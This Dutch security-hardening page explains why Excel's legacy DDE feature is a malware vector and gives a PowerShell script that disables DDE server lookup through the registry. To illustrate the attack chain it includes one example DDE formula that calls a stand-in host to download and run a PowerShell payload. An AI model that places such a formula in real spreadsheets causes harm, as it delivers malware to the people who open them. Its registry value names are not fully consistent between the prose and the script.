L1 BIO 12.02.01 ISO A.8.7 CIS Excel Security

Excel DDE Server Lookup Uitgeschakeld

πŸ“… 2025-10-30
β€’
⏱️ 7 minuten lezen
β€’
πŸ”΄ Must-Have

πŸ’Ό Management Samenvatting

Dynamic Data Exchange (DDE) moet volledig worden uitgeschakeld in Excel omdat het een legacy protocol is dat actief wordt misbruikt voor code execution attacks zonder macros, waardoor het een kritieke aanvalsvector vormt.

Aanbeveling
IMPLEMENT
Risico zonder
Critical
Risk Score
9/10
Implementatie
2u (tech: 1u)
Van toepassing op:
βœ“ Excel
βœ“ Microsoft 365 Apps

DDE ATTACKS (2017-2018 EPIDEMIC): DDE is Legacy Windows protocol voor data delen tussen applicaties. CRITICAL VULNERABILITY: Excel formulas kunnen DDE commands embedded hebben die: External commands executeren via cmd.exe, PowerShell scripts downloaden en uitvoeren, Malware deployen zonder macros ingeschakeld. ATTACK CHAIN: Phishing email met Excel attachment (.xlsx) β†’ Geen macros (bypasses Macro beveiliging!) β†’ File bevat DDE formula: =cmd|'/c powershell IEX(wget malware.com/payload)' β†’ User opens file β†’ Excel prompt: 'Update automatische links?' β†’ gebruiker klikt Yes (social engineering) β†’ PowerShell executes β†’ Malware downloaded. MASSALE EXPLOITATION 2017: DNSMessenger malware via DDE, Necurs botnet DDE campaigns, Nation-state actors (APT28/Fancy Bear). MICROSOFT PATCHES: Multiple patches released, maar DDE functionality not fully removed (legacy compatibility), Schakel uit via policy is essential. CIS/DISA STIG: MANDATORY Schakel uit DDE. LEGACY FEATURE: DDE is uit 1980s/1990s, Moderne apps gebruiken OLE/COM (not DDE), Geen legitimate business gebruiken case voor DDE in modern Excel.

PowerShell Modules Vereist
Primary API: Intune / Group Policy
Connection: Registry
Required Modules:

Implementatie

Schakel uit DDE via Registry: HKCU:\Software\Policies\Microsoft\Office\16.0\Excel\Security\WorkbookLinkWarnings is 2 (Schakel uit DDE updates), HKCU:\Software\Policies\Microsoft\Office\16.0\Excel\Security\DDEAllowed is 0 (Schakel uit DDE). DISA STIG O365-EX-000005. EFFECT: DDE formulas worden NIET uitgevoerd, Geen 'Update automatische links' prompt meer, External command execution via DDE geblokkeerd, Legacy DDE-based workflows broken (almost non-existent).

Vereisten

  1. Excel (Microsoft 365 Apps)
  2. Verification: Geen business processes afhankelijk van DDE (zeer zeldzaam)
  3. User awareness: DDE-based data connections niet meer werken

Implementatie

Gebruik PowerShell-script disable-dde-server-lookup.ps1 (functie Invoke-Remediation) – Schakel uit DDE volledig.

Intune: Excel Security β†’ DDE Server Lookup/Launch is Disabled

monitoring

Gebruik PowerShell-script disable-dde-server-lookup.ps1 (functie Invoke-Monitoring) – Verifieer DDE disabled.

Compliance en Auditing

  1. DISA STIG O365-EX-000005 - MANDATORY
  2. CIS Microsoft 365 Benchmark
  3. BIO 12.02 - Bescherming tegen malware: DDE is code execution vector
  4. ISO 27001 A.8.7

Remediatie

Gebruik PowerShell-script disable-dde-server-lookup.ps1 (functie Invoke-Remediation) – Herstellen.

Compliance & Frameworks

Automation

Gebruik het onderstaande PowerShell script om deze security control te monitoren en te implementeren. Het script bevat functies voor zowel monitoring (-Monitoring) als remediation (-Remediation).

PowerShell
<# .SYNOPSIS Schakelt Dynamic Data Exchange (DDE) server lookup uit in Excel .DESCRIPTION Dit script implementeert CIS control O365-EX-000005 voor het uitschakelen van DDE server lookup in Microsoft Excel. DDE is een legacy technologie die kan worden misbruikt voor aanvallen, daarom moet deze uitgeschakeld worden voor betere beveiliging. .REQUIREMENTS - PowerShell 5.1 of hoger - Lokale administrator rechten voor registry wijzigingen - Microsoft Excel geΓ―nstalleerd .PARAMETER Monitoring Controleert de huidige compliance status .PARAMETER Remediation Past de aanbevolen configuratie toe .PARAMETER Revert Herstelt de originele configuratie .PARAMETER WhatIf Toont wat er zou gebeuren zonder wijzigingen door te voeren .EXAMPLE .\disable-dde-server-lookup.ps1 -Monitoring Controleert of DDE server lookup is uitgeschakeld .EXAMPLE .\disable-dde-server-lookup.ps1 -Remediation Schakelt DDE server lookup uit in Excel .NOTES Registry pad: HKCU:\Software\Policies\Microsoft\Office\16.0\Excel\Security Waarde: DDEServerLookupDisabled = 1 CIS Control: O365-EX-000005 DISA STIG: Microsoft Office 365 ProPlus v3r3 #> #Requires -Version 5.1 param( [switch]$Monitoring, [switch]$Remediation, [switch]$Revert, [switch]$WhatIf ) # Globale variabelen $RegistryPath = "HKCU:\Software\Policies\Microsoft\Office\16.0\Excel\Security" $ValueName = "DDEServerLookupDisabled" $ExpectedValue = 1 $ControlID = "O365-EX-000005" function Test-Compliance { try { if (-not (Test-Path $RegistryPath)) { return $false } $currentValue = Get-ItemProperty -Path $RegistryPath -Name $ValueName -ErrorAction SilentlyContinue return ($currentValue -and $currentValue.$ValueName -eq $ExpectedValue) } catch { return $false } } function Invoke-Monitoring { Write-Host "Monitoring ${ControlID}: DDE server lookup uitschakelen in Excel" -ForegroundColor Green try { if (-not (Test-Path $RegistryPath)) { Write-Host "βœ— Registry pad bestaat niet: $RegistryPath" -ForegroundColor Red return $false } $currentValue = Get-ItemProperty -Path $RegistryPath -Name $ValueName -ErrorAction SilentlyContinue if ($currentValue -and $currentValue.$ValueName -eq $ExpectedValue) { Write-Host "βœ“ Control compliant: ${ValueName} = $ExpectedValue" -ForegroundColor Green return $true } else { $actualValue = if ($currentValue) { $currentValue.$ValueName } else { "Not Set" } Write-Host "βœ— Control non-compliant: ${ValueName} = $actualValue (Expected: $ExpectedValue)" -ForegroundColor Red return $false } } catch { Write-Host "βœ— Fout bij controleren registry instelling: $($_.Exception.Message)" -ForegroundColor Red return $false } } function Invoke-Remediation { Write-Host "Remediating ${ControlID}: DDE server lookup uitschakelen in Excel" -ForegroundColor Yellow try { if ($WhatIf) { Write-Host "WhatIf: Zou registry waarde instellen: ${ValueName} = $ExpectedValue" -ForegroundColor Cyan return $true } if (-not (Test-Path $RegistryPath)) { Write-Host "Registry pad aanmaken: $RegistryPath" -ForegroundColor Yellow New-Item -Path $RegistryPath -Force | Out-Null } Set-ItemProperty -Path $RegistryPath -Name $ValueName -Value $ExpectedValue -Type DWord -Force Write-Host "βœ“ Registry waarde succesvol ingesteld: ${ValueName} = $ExpectedValue" -ForegroundColor Green Start-Sleep -Seconds 1 return Invoke-Monitoring } catch { Write-Host "βœ— Fout bij configureren registry instelling: $($_.Exception.Message)" -ForegroundColor Red return $false } } function Invoke-Revert { Write-Host "Reverting ${ControlID}: DDE server lookup instelling herstellen" -ForegroundColor Yellow try { if ($WhatIf) { Write-Host "WhatIf: Zou registry waarde verwijderen: ${ValueName}" -ForegroundColor Cyan return $true } if (Test-Path $RegistryPath) { Remove-ItemProperty -Path $RegistryPath -Name $ValueName -ErrorAction SilentlyContinue Write-Host "βœ“ Registry waarde verwijderd: ${ValueName}" -ForegroundColor Green } return $true } catch { Write-Host "βœ— Fout bij herstellen registry instelling: $($_.Exception.Message)" -ForegroundColor Red return $false } } # Hoofd uitvoering try { if ($Monitoring) { $result = Invoke-Monitoring exit $(if ($result) { 0 } else { 1 }) } elseif ($Remediation) { $result = Invoke-Remediation exit $(if ($result) { 0 } else { 1 }) } elseif ($Revert) { $result = Invoke-Revert exit $(if ($result) { 0 } else { 1 }) } else { Write-Host "Gebruik: .\disable-dde-server-lookup.ps1 [-Monitoring] [-Remediation] [-Revert] [-WhatIf]" -ForegroundColor Yellow Write-Host " -Monitoring: Controleer huidige compliance status" -ForegroundColor White Write-Host " -Remediation: Pas aanbevolen configuratie toe" -ForegroundColor White Write-Host " -Revert: Herstel originele configuratie" -ForegroundColor White Write-Host " -WhatIf: Toon wat er zou gebeuren" -ForegroundColor White Write-Host "" Write-Host "Handmatige configuratie:" -ForegroundColor Cyan Write-Host "Group Policy: User Configuration > Administrative Templates > Microsoft Excel 2016" -ForegroundColor White Write-Host "> Excel Options > Security > Trust Center" -ForegroundColor White Write-Host "> Don't allow Dynamic Data Exchange (DDE) server lookup in Excel: Enabled" -ForegroundColor White } } catch { Write-Host "βœ— Onverwachte fout: $($_.Exception.Message)" -ForegroundColor Red exit 1 }

Risico zonder implementatie

Risico zonder implementatie
Critical: KRITIEK: DDE attacks is code execution ZONDER macros. Massaal misbruikt 2017-2018 (DNSMessenger, APT28). Bypasses Macro beveiliging. Zonder DDE blocking highly vulnerable.

Management Samenvatting

Schakel uit DDE volledig in Excel. Voorkomt code execution via DDE formulas (bypasses Macro beveiliging). DISA STIG O365-EX-000005 MANDATORY. Voldoet aan BIO 12.02, ISO 27001 A.8.7. Implementatie: 1-2 uur. KRITIEKE EXPLOIT PREVENTION.